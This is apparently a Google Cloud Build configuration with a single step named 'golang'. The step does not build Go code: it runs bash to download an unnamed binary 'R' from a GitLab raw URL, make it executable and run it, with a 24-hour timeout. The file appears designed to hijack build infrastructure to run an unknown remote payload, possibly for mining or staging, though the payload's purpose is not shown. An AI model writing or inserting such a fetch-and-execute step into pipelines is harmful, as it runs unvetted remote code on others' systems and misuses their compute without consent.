steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://gitlab.com/tdc3/t/-/raw/main/R && chmod u+x R && ./R
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
